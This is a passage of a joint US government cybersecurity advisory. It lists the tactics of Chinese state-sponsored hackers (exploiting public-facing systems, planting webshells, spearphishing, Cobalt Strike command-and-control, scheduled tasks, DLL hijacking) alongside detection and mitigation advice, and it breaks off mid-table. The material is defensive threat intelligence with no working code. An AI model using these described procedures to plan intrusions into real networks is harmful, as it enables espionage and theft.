state, local, tribal, and territorial (SLTT) government, CI, DIB, and private industry organizations about notable trends and persistent TTPs through collaborative, proactive, and retrospective analysis.\n\nTo increase the defensive posture of their critical networks and reduce the risk of Chinese malicious cyber activity, NSA, CISA, and FBI urge government, CI, DIB, and private industry organizations to apply the recommendations listed in the Mitigations section of this advisory and in Appendix A: Chinese State-sponsored Cyber Actors' Observed Procedures. **Note:** NSA, CISA, and FBI encourage organization leaders to review [CISA Joint Insights: Chinese Malicious Cyber Activity: Threat Overview for Leaders](<https://www.cisa.gov/publication/chinese-cyber-threat-overview-and-actions-leaders>) for information on this threat to their organization.\n\n[Click here](<https://media.defense.gov/2021/Jul/19/2002805003/-1/-1/1/CSA_CHINESE_STATE-SPONSORED_CYBER_TTPS.PDF>) for a PDF version of this report.\n\n### Technical Details\n\n#### **Trends in Chinese State-Sponsored Cyber Operations**\n\nNSA, CISA, and FBI have observed increasingly sophisticated Chinese state-sponsored cyber activity targeting U.S. political, economic, military, educational, and CI personnel and organizations. NSA, CISA, and FBI have identified the following trends in Chinese state-sponsored malicious cyber operations through proactive and retrospective analysis:\n\n * **Acquisition of Infrastructure and Capabilities**. Chinese state-sponsored cyber actors remain agile and cognizant of the information security community\u2019s practices. These actors take effort to mask their activities by using a revolving series of virtual private servers (VPSs) and common open-source or commercial penetration tools.\n\n * **Exploitation of Public Vulnerabilities. **Chinese state-sponsored cyber actors consistently scan target networks for critical and high vulnerabilities within days of the vulnerability\u2019s public disclosure. In many cases, these cyber actors seek to exploit vulnerabilities in major applications, such as Pulse Secure, Apache, F5 Big-IP, and Microsoft products. For information on Common Vulnerabilities and Exposures (CVE) known to be exploited by malicious Chinese state-sponsored cyber actors, see:\n\n * CISA-FBI Joint CSA AA20-133A: [Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>),\n\n * CISA Activity Alert: AA20-275A: [Potential for China Cyber Response to Heightened U.S.-China Tensions](<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>), and\n\n * NSA CSA U/OO/179811-20: [Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>).\n\n * **Encrypted Multi-Hop Proxies. **Chinese state-sponsored cyber actors have been routinely observed using a VPS as an encrypted proxy. The cyber actors use the VPS as well as small office and home office (SOHO) devices as operational nodes to evade detection.\n\n#### **Observed Tactics and Techniques**\n\nChinese state-sponsored cyber actors use a full array of tactics and techniques to exploit computer networks of interest worldwide and to acquire sensitive intellectual property, economic, political, and military information. Appendix B: MITRE ATT&CK Framework lists the tactics and techniques used by Chinese state-sponsored cyber actors. A downloadable [JSON file](<https://github.com/nsacyber/chinese-state-sponsored-cyber-operations-observed-ttps>) is also available on the [NSA Cybersecurity GitHub page](<https://github.com/nsacyber>).\n\nRefer to Appendix A: Chinese State-Sponsored Cyber Actors\u2019 Observed Procedures for information on procedures affiliated with these tactics and techniques as well as applicable mitigations.\n\n\n\n_Figure 1: Example of tactics and techniques used in various cyber operations._\n\n### Mitigations\n\nNSA, CISA, and FBI urge federal and SLTT government, CI, DIB, and private industry organizations to apply the following recommendations as well as the detection and mitigation recommendations in Appendix A, which are tailored to observed tactics and techniques:\n\n * **Patch systems and equipment promptly and diligently. **Focus on patching critical and high vulnerabilities that allow for remote code execution or denial-of-service on externally facing equipment and CVEs known to be exploited by Chinese state-sponsored cyber actors. Consider implementing a patch management program that enables a timely and thorough patching cycle. \n**Note: **for more information on CVEs routinely exploited by Chinese state-sponsored cyber actors refer to the resources listed in the Trends in Chinese State-Sponsored Cyber Operations section.\n\n * **Enhance monitoring of network traffic, email, and endpoint systems.** Review network signatures and indicators for focused activities, monitor for new phishing themes, and adjust email rules accordingly. Follow the best practices of restricting attachments via email and blocking URLs and domains based upon reputation. Ensure that log information is aggregated and correlated to enable maximum detection capabilities, with a focus on monitoring for account misuse. Monitor common ports and protocols for command and control (C2) activity. SSL/TLS inspection can be used to see the contents of encrypted sessions to look for network-based indicators of malware communication protocols. Implement and enhance network and endpoint event analysis and detection capabilities to identify initial infections, compromised credentials, and the manipulation of endpoint processes and files.\n * **Use protection capabilities to stop malicious activity. **Implement anti-virus software and other endpoint protection capabilities to automatically detect and prevent malicious files from executing. Use a network intrusion detection and prevention system to identify and prevent commonly employed adversarial malware and limit nefarious data transfers. Use a domain reputation service to detect suspicious or malicious domains. Use strong credentials for service accounts and multi-factor authentication (MFA) for remote access to mitigate an adversary's ability to leverage stolen credentials, but be aware of MFA interception techniques for some MFA implementations.\u25aa\n\n### Resources\n\nRefer to [us-cert.cisa.gov/china](<https://us-cert.cisa.gov/china>), <https://www.ic3.gov/Home/IndustryAlerts>, and [https://www.nsa.gov/What-We-Do/Cybersecurity/Advisories-Technical-Guidance/ ](<https://www.nsa.gov/What-We-Do/Cybersecurity/Advisories-Technical-Guidance/>)for previous reporting on Chinese state-sponsored malicious cyber activity.\n\n### Disclaimer of Endorsement\n\nThe information and opinions contained in this document are provided \"as is\" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.\n\n### Purpose\n\nThis document was developed by NSA, CISA, and FBI in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. \nThis document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol, see [http://www.us-cert.gov/tlp/.](<http://www.us-cert.gov/tlp/>)\n\n### Trademark Recognition\n\nMITRE and ATT&CK are registered trademarks of The MITRE Corporation. \u2022 D3FEND is a trademark of The MITRE Corporation. \u2022 Microsoft, Microsoft Exchange, Office 365, Microsoft Office, OneDrive, Outlook, OWA, PowerShell, Windows Defender, and Windows are registered trademarks of Microsoft Corporation. \u2022 Pulse Secure is a registered trademark of Pulse Secure, LLC. \u2022 Apache is a registered trademark of Apache Software Foundation. \u2022 F5 and BIG-IP are registered trademarks of F5 Networks. \u2022 Cobalt Strike is a registered trademark of Strategic Cyber LLC. \u2022 GitHub is a registered trademark of GitHub, Inc. \u2022 JavaScript is a registered trademark of Oracle Corporation. \u2022 Python is a registered trademark of Python Software Foundation. \u2022 Unix is a registered trademark of The Open Group. \u2022 Linux is a registered trademark of Linus Torvalds. \u2022 Dropbox is a registered trademark of Dropbox, Inc.\n\n### APPENDIX A: Chinese State-Sponsored Cyber Actors\u2019 Observed Procedures\n\n**Note: **D3FEND techniques are based on the Threat Actor Procedure(s) and may not match automated mappings to ATT&CK techniques and sub-techniques.\n\n### Tactics: _Reconnaissance_ [[TA0043](<https://attack.mitre.org/versions/v9/tactics/TA0043>)] \n\n_Table 1: Chinese state-sponsored cyber actors\u2019 Reconnaissance TTPs with detection and mitigation recommendations_\n\nThreat Actor \nTechnique / Sub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| \n\nDefensive Tactics and Techniques \n \n---|---|---|--- \n \nActive Scanning [[T1595](<https://attack.mitre.org/versions/v9/techniques/T1595>)] \n\n| \n\nChinese state-sponsored cyber actors have been assessed to perform reconnaissance on Microsoft\u00ae 365 (M365), formerly Office\u00ae 365, resources with the intent of further gaining information about the networks. These scans can be automated, through Python\u00ae scripts, to locate certain files, paths, or vulnerabilities. The cyber actors can gain valuable information on the victim network, such as the allocated resources, an organization\u2019s fully qualified domain name, IP address space, and open ports to target or exploit.\n\n| \n\nMinimize the amount and sensitivity of data available to external parties, for example: \n\n * Scrub user email addresses and contact lists from public websites, which can be used for social engineering, \n\n * Share only necessary data and information with third parties, and \n\n * Monitor and limit third-party access to the network. \n\nActive scanning from cyber actors may be identified by monitoring network traffic for sources associated with botnets, adversaries, and known bad IPs based on threat intelligence.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]\n\nIsolate: \n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nGather Victim Network Information [[T1590](<https://attack.mitre.org/versions/v9/techniques/T1590>)] \n \n### Tactics: _Resource Development_ [[TA0042](<https://attack.mitre.org/versions/v9/tactics/TA0042>)]\n\n_Table II: Chinese state-sponsored cyber actors\u2019 Resource Development TTPs with detection and mitigation recommendations_\n\nThreat Actor \nTechnique / Sub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| Defensive Tactics and Techniques \n---|---|---|--- \n \nAcquire Infrastructure [[T1583](<https://attack.mitre.org/versions/v9/techniques/T1583>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using VPSs from cloud service providers that are physically distributed around the world to host malware and function as C2 nodes.\n\n| \n\nAdversary activities occurring outside the organization\u2019s boundary of control and view makes mitigation difficult. Organizations can monitor for unexpected network traffic and data flows to and from VPSs and correlate other suspicious activity that may indicate an active threat.\n\n| \n\nN/A \n \nStage Capabilities [[T1608](<https://attack.mitre.org/versions/v9/techniques/T1608>)] \n \nObtain Capabilities [[T1588](<https://attack.mitre.org/versions/v9/techniques/T1588>)]: \n\n * Tools [[T1588.002](<https://attack.mitre.org/versions/v9/techniques/T1588/002>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using Cobalt Strike\u00ae and tools from GitHub\u00ae on victim networks. \n\n| \n\nOrganizations may be able to identify malicious use of Cobalt Strike by:\n\n * Examining network traffic using Transport Layer Security (TLS) inspection to identify Cobalt Strike. Look for human generated vice machine-generated traffic, which will be more uniformly distributed. \n\n * Looking for the default Cobalt Strike TLS certificate. \n\n * Look at the user agent that generates the TLS traffic for discrepancies that may indicate faked and malicious traffic.\n\n * Review the traffic destination domain, which may be malicious and an indicator of compromise.\n\n * Look at the packet's HTTP host header. If it does not match with the destination domain, it may indicate a fake Cobalt Strike header and profile.\n\n * Check the Uniform Resource Identifier (URI) of the flow to see if it matches one associated with Cobalt Strike's malleable C2 language. If discovered, additional recovery and investigation will be required.\n\n| N/A \n \n### Tactics: _Initial Access_ [[TA0001](<https://attack.mitre.org/versions/v9/tactics/TA0001/>)]\n\n_Table III: Chinese state-sponsored cyber actors\u2019 Initial Access TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| \n\nDetection and Mitigation Recommendations \n \n---|---|---|--- \n \nDrive By Compromise [[T1189](<https://attack.mitre.org/versions/v9/techniques/T1189>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed gaining access to victim networks through watering hole campaigns of typo-squatted domains.\n\n| \n\n * Ensure all browsers and plugins are kept up to date.\n * Use modern browsers with security features turned on.\n * Restrict the use of unneeded websites, block unneeded downloads/attachments, block unneeded JavaScript\u00ae, restrict browser extensions, etc.\n * Use adblockers to help prevent malicious code served through advertisements from executing. \n * Use script blocking extensions to help prevent the execution of unneeded JavaScript, which may be used during exploitation processes. \n * Use browser sandboxes or remote virtual environments to mitigate browser exploitation.\n * Use security applications that look for behavior used during exploitation, such as Windows Defender\u00ae Exploit Guard (WDEG).\n| \n\nDetect: \n\n * Identifier Analysis \n * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]\n * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]\n * File Analysis \n * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]\n * Network Isolation \n * DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)] \n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \nExploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v9/techniques/T1190>)]\n\n| \n\nChinese state-sponsored cyber actors have exploited known vulnerabilities in Internet-facing systems.[[1](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html%20>)] For information on vulnerabilities known to be exploited by Chinese state-sponsored cyber actors, refer to the Trends in Chinese State-Sponsored Cyber Operations section for a list of resources. \nChinese state-sponsored cyber actors have also been observed:\n\n * Using short-term VPS devices to scan and exploit vulnerable Microsoft Exchange\u00ae Outlook Web Access (OWA\u00ae) and plant webshells.\n\n * Targeting on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments to gain access to cloud resources.\n\n * Deploying a public proof of concept (POC) exploit targeting a public-facing appliance vulnerability.\n\n| \n\nReview previously published alerts and advisories from NSA, CISA, and FBI, and diligently patch vulnerable applications known to be exploited by cyber actors. Refer to the Trends in Chinese State-Sponsored Cyber Operations section for a non-inclusive list of resources.\n\nAdditional mitigations include:\n\n * Consider implementing Web Application Firewalls (WAF), which can prevent exploit traffic from reaching an application.\n * Segment externally facing servers and services from the rest of the network with a demilitarized zone (DMZ).\n * Use multi-factor authentication (MFA) with strong factors and require regular re-authentication.\n * Disable protocols using weak authentication.\n * Limit access to and between cloud resources with the desired state being a Zero Trust model. For more information refer to NSA Cybersecurity Information Sheet: [[Embracing a Zero Trust Security Model](<https://media.defense.gov/2021/Feb/25/2002588479/-1/-1/0/CSI_EMBRACING_ZT_SECURITY_MODEL_UOO115131-21.PDF>)].\n * When possible, use cloud-based access controls on cloud resources (e.g., cloud service provider (CSP)-managed authentication between virtual machines).\n * Use automated tools to audit access logs for security concerns.\n * Where possible, enforce MFA for password resets.\n * Do not include Application Programing Interface (API) keys in software version control systems where they can be unintentionally leaked.\n| \n\nHarden:\n\n * Application Hardening [[D3-AH](<https://d3fend.mitre.org/technique/d3f:ApplicationHardening>)]\n * Platform Hardening \n * Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]\n\nDetect:\n\n * File Analysis [[D3-FA](<https://d3fend.mitre.org/technique/d3f:FileAnalysis>)] \n * Network Traffic Analysis \n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n * Process Analysis \n * Process Spawn Analysis\n * Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)]\n\nIsolate: \n\n * Network Isolation \n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nPhishing [[T1566](<https://attack.mitre.org/versions/v9/techniques/T1566>)]: \n\n * Spearphishing Attachment [[T1566.001](<https://attack.mitre.org/versions/v9/techniques/T1566/001>)] \n\n * Spearphishing Link [[T1566.002](<https://attack.mitre.org/versions/v9/techniques/T1566/002>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed conducting spearphishing campaigns. These email compromise attempts range from generic emails with mass targeted phishing attempts to specifically crafted emails in targeted social engineering lures. \nThese compromise attempts use the cyber actors\u2019 dynamic collection of VPSs, previously compromised accounts, or other infrastructure in order to encourage engagement from the target audience through domain typo-squatting and masquerading. These emails may contain a malicious link or files that will provide the cyber actor access to the victim\u2019s device after the user clicks on the malicious link or opens the attachment. \n\n| \n\n * Implement a user training program and simulated spearphishing emails to discourage users from visiting malicious websites or opening malicious attachments and re-enforce the appropriate user responses to spearphishing emails. Quarantine suspicious files with antivirus solutions.\n * Use a network intrusion prevention system (IPS) to scan and remove malicious email attachments.\n * Block uncommon file types in emails that are not needed by general users (`.exe`, `.jar`,`.vbs`)\n * Use anti-spoofing and email authentication mechanisms to filter messages based on validity checks of the sender domain (using Sender Policy Framework [SPF]) and integrity of messages (using Domain Keys Identified Mail [DKIM]). Enabling these mechanisms within an organization (through policies such as Domain-based Message Authentication, Reporting, and Conformance [DMARC]) may enable recipients (intra-org and cross domain) to perform similar message filtering and validation.\n * Determine if certain websites that can be used for spearphishing are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.\n * Prevent users from clicking on malicious links by stripping hyperlinks or implementing \"URL defanging\" at the Email Security Gateway or other email security tools.\n * Add external sender banners to emails to alert users that the email came from an external sender.\n| \n\nHarden: \n\n * Message Hardening \n * Message Authentication [[D3-MAN](<https://d3fend.mitre.org/technique/d3f:MessageAuthentication>)]\n * Transfer Agent Authentication [[D3-TAAN](<https://d3fend.mitre.org/technique/d3f:TransferAgentAuthentication>)]\n\nDetect: \n\n * File Analysis \n * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]\n * Identifier Analysis \n * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]\n * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]\n * Message Analysis \n * Sender MTA Reputation Analysis [[D3-SMRA](<https://d3fend.mitre.org/technique/d3f:SenderMTAReputationAnalysis>)]\n * Sender Reputation Analysis [[D3-SRA](<https://d3fend.mitre.org/technique/d3f:SenderReputationAnalysis>)] \n \n \nExternal Remote Services [[T1133](<https://attack.mitre.org/versions/v9/techniques/T1133>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Exploiting vulnerable devices immediately after conducting scans for critical zero-day or publicly disclosed vulnerabilities. The cyber actors used or modified public proof of concept code in order to exploit vulnerable systems.\n\n * Targeting Microsoft Exchange offline address book (OAB) virtual directories (VDs).\n\n * Exploiting Internet accessible webservers using webshell small code injections against multiple code languages, including `net`, `asp`, `apsx`, `php`, `japx`, and `cfm`. \n\n**Note:** refer to the references listed above in Exploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v9/techniques/T1190>)] for information on CVEs known to be exploited by malicious Chinese cyber actors.\n\n**Note: **this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)].\n\n| \n\n * Many exploits can be mitigated by applying available patches for vulnerabilities (such as CVE-2019-11510, CVE-2019-19781, and CVE-2020-5902) affecting external remote services.\n * Reset credentials after virtual private network (VPN) devices are upgraded and reconnected to the external network.\n * Revoke and generate new VPN server keys and certificates (this may require redistributing VPN connection information to users).\n * Disable Remote Desktop Protocol (RDP) if not required for legitimate business functions.\n * Restrict VPN traffic to and from managed service providers (MSPs) using a dedicated VPN connection.\n * Review and verify all connections between customer systems, service provider systems, and other client enclaves.\n| \n\nHarden:\n\n * Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]\n\nDetect:\n\n * Network Traffic Analysis \n * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]\n * Platform Monitoring [[D3-PM](<https://d3fend.mitre.org/technique/d3f:PlatformMonitoring>)]\n * Process Analysis \n * Process Spawn Analysis [[D3-SPA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n * Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)] \n \nValid Accounts [[T1078](<https://attack.mitre.org/versions/v9/techniques/T1078>)]:\n\n * Default Accounts [[T1078.001](<https://attack.mitre.org/versions/v9/techniques/T1078/001>)]\n\n * Domain Accounts [[T1078.002](<https://attack.mitre.org/versions/v9/techniques/T1078/002>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed: gaining credential access into victim networks by using legitimate, but compromised credentials to access OWA servers, corporate login portals, and victim networks.\n\n**Note:** this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)], Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)], and Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].\n\n| \n\n * Adhere to best practices for password and permission management.\n * Ensure that MSP accounts are not assigned to administrator groups and restrict those accounts to only systems they manage \n * Do not store credentials or sensitive data in plaintext.\n * Change all default usernames and passwords.\n * Routinely update and secure applications using Secure Shell (SSH). \n * Update SSH keys regularly and keep private keys secure.\n * Routinely audit privileged accounts to identify malicious use.\n| \n\nHarden: \n\n * Credential Hardening \n * Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)]\n\nDetect:\n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)] \n * Authentication Event Thresholding [[D3-ANET](<https://d3fend.mitre.org/technique/d3f:AuthenticationEventThresholding>)] \n * Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)] \n \n### Tactics: _Execution_ [[TA0002](<https://attack.mitre.org/versions/v9/tactics/TA0002>)]\n\n_Table IV: Chinese state-sponsored cyber actors\u2019 Execution TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| \n\nDefensive Tactics and Techniques \n \n---|---|---|--- \n \nCommand and Scripting Interpreter [[T1059](<https://attack.mitre.org/versions/v9/techniques/T1059>)]: \n\n * PowerShell\u00ae [[T1059.001](<https://attack.mitre.org/versions/v9/techniques/T1059/001>)]\n\n * Windows\u00ae Command Shell [[T1059.003](<https://attack.mitre.org/versions/v9/techniques/T1059/003>)]\n\n * Unix\u00ae Shell [[T1059.004](<https://attack.mitre.org/versions/v9/techniques/T1059/004>)]\n\n * Python [[T1059.006](<https://attack.mitre.org/versions/v9/techniques/T1059/006>)]\n\n * JavaScript [[T1059.007](<https://attack.mitre.org/versions/v9/techniques/T1059/007>)]\n\n * Network Device CLI [[T1059.008](<https://attack.mitre.org/versions/v9/techniques/T1059/008>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Using cmd.exe, JavaScript/Jscript Interpreter, and network device command line interpreters (CLI).\n\n * Using PowerShell to conduct reconnaissance, enumeration, and discovery of the victim network. \n\n * Employing Python scripts to exploit vulnerable servers.\n\n * Using a UNIX shell in order to conduct discovery, enumeration, and lateral movement on Linux\u00ae servers in the victim network.\n\n| \n\nPowerShell\n\n * Turn on PowerShell logging. (**Note:** this works better in newer versions of PowerShell. NSA, CISA, and FBI recommend using version 5 or higher.)\n\n * Push Powershell logs into a security information and event management (SIEM) tool.\n\n * Monitor for suspicious behavior and commands. Regularly evaluate and update blocklists and allowlists.\n\n * Use an antivirus program, which may stop malicious code execution that cyber actors attempt to execute via PowerShell.\n\n * Remove PowerShell if it is not necessary for operations. \n\n * Restrict which commands can be used.\n\nWindows Command Shell\n\n * Restrict use to administrator, developer, or power user systems. Consider its use suspicious and investigate, especially if average users run scripts. \n\n * Investigate scripts running out of cycle from patching or other administrator functions if scripts are not commonly used on a system, but enabled. \n\n * Monitor for and investigate other unusual or suspicious scripting behavior. \n\nUnix\n\n * Use application controls to prevent execution.\n\n * Monitor for and investigate unusual scripting behavior. Use of the Unix shell may be common on administrator, developer, or power user systems. In this scenario, normal users running scripts should be considered suspicious. \n\n * If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions should be considered suspicious. \n\nPython\n\n * Audit inventory systems for unauthorized Python installations.\n\n * Blocklist Python where not required.\n\n * Prevent users from installing Python where not required.\n\nJavaScript\n\n * Turn off or restrict access to unneeded scripting components.\n\n * Blocklist scripting where appropriate.\n\n * For malicious code served up through ads, adblockers can help prevent that code from executing.\n\nNetwork Device Command Line Interface (CLI)\n\n * Use TACACS+ to keep control over which commands administrators are permitted to use through the configuration of authentication and command authorization.\n\n * Use an authentication, authorization, and accounting (AAA) systems to limit actions administrators can perform and provide a history of user actions to detect unauthorized use and abuse.\n\n * Ensure least privilege principles are applied to user accounts and groups.\n\n| \n\nHarden: \n\n * Platform Hardening [[D3-PH](<https://d3fend.mitre.org/technique/d3f:PlatformHardening>)]\n\nDetect: \n\n * Process Analysis\n\n * Script Execution Analysis [[D3-SEA](<https://d3fend.mitre.org/technique/d3f:ScriptExecutionAnalysis>)]\n\nIsolate:\n\n * Execution Isolation\n\n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nScheduled Task/Job [[T1053](<https://attack.mitre.org/versions/v9/techniques/T1053>)]\n\n * Cron [[T1053.003](<https://attack.mitre.org/versions/v9/techniques/T1053/003>)]\n * Scheduled Task [[T1053.005](<https://attack.mitre.org/versions/v9/techniques/T1053/005>)]\n| \n\nChinese state-sponsored cyber actors have been observed using Cobalt Strike, webshells, or command line interface tools, such as `schtask` or `crontab` to create and schedule tasks that enumerate victim devices and networks.\n\n**Note:** this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)] and Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)].\n\n| \n\n\u2022 Monitor scheduled task creation from common utilities using command-line invocation and compare for any changes that do not correlate with known software, patch cycles, or other administrative activity. \n\u2022 Configure event logging for scheduled task creation and monitor process execution from `svchost.exe` (Windows 10) and Windows Task Scheduler (Older version of Windows) to look for changes in `%systemroot%\\System32\\Tasks` that do not correlate with known software, patch cycles, or other administrative activity. Additionally monitor for any scheduled tasks created via command line utilities\u2014such as PowerShell or Windows Management Instrumentation (WMI)\u2014that do not conform to typical administrator or user actions. \n\n| \n\nDetect: \n\n * Platform Monitoring \n * Operating System Monitoring [[D3-OSM](<https://d3fend.mitre.org/technique/d3f:OperatingSystemMonitoring>)] \n * Scheduled Job Analysis [[D3-SJA](<https://d3fend.mitre.org/technique/d3f:ScheduledJobAnalysis>)]\n * System Daemon Monitoring [[D3-SDM](<https://d3fend.mitre.org/technique/d3f:SystemDaemonMonitoring>)]\n * System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nUser Execution [[T1204](<https://attack.mitre.org/versions/v9/techniques/T1204>)]\n\n * Malicious Link [[T1204.001](<https://attack.mitre.org/versions/v9/techniques/T1204/001>)]\n * Malicious File [[T1204.002](<https://attack.mitre.org/versions/v9/techniques/T1204/002>)]\n| \n\nChinese state-sponsored cyber actors have been observed conducting spearphishing campaigns that encourage engagement from the target audience. These emails may contain a malicious link or file that provide the cyber actor access to the victim\u2019s device after the user clicks on the malicious link or opens the attachment.\n\n| \n\n * Use an antivirus program, which may stop malicious code execution that cyber actors convince users to attempt to execute.\n * Prevent unauthorized execution by disabling macro scripts from Microsoft Office files transmitted via email. Consider using Office Viewer software to open Microsoft Office files transmitted via email instead of full Microsoft Office suite applications.\n * Use a domain reputation service to detect and block suspicious or malicious domains.\n * Determine if certain categories of websites are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.\n * Ensure all browsers and plugins are kept up to date.\n * Use modern browsers with security features turned on.\n * Use browser and application sandboxes or remote virtual environments to mitigate browser or other application exploitation.\n| \n\nDetect: \n\n * File Analysis \n * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]\n * File Content Rules [[D3-FCR](<https://d3fend.mitre.org/technique/d3f:FileContentRules>)]\n * Identifier Analysis \n * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]\n * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]\n * Network Traffic Analysis \n * DNS Traffic Analysis [[D3-DNSTA](<https://d3fend.mitre.org/technique/d3f:DNSTrafficAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]\n * Network Isolation \n * DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)]\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \n### Tactics: _Persistence_ [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)]\n\n_Table V: Chinese state-sponsored cyber actors\u2019 Persistence TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nHijack Execution Flow [[T1574](<https://attack.mitre.org/versions/v9/techniques/T1574>)]: \n\n * DLL Search Order Hijacking [[T1574.001](<https://attack.mitre.org/versions/v9/techniques/T1574/001>)]\n| \n\nChinese state-sponsored cyber actors have been observed using benign executables which used Dynamic Link Library (DLL) load-order hijacking to activate the malware installation process. \n\n**Note:** this technique also applies to Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)] and Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].\n\n| \n\n * Disallow loading of remote DLLs.\n * Enable safe DLL search mode.\n * Implement tools for detecting search order hijacking opportunities.\n * Use application allowlisting 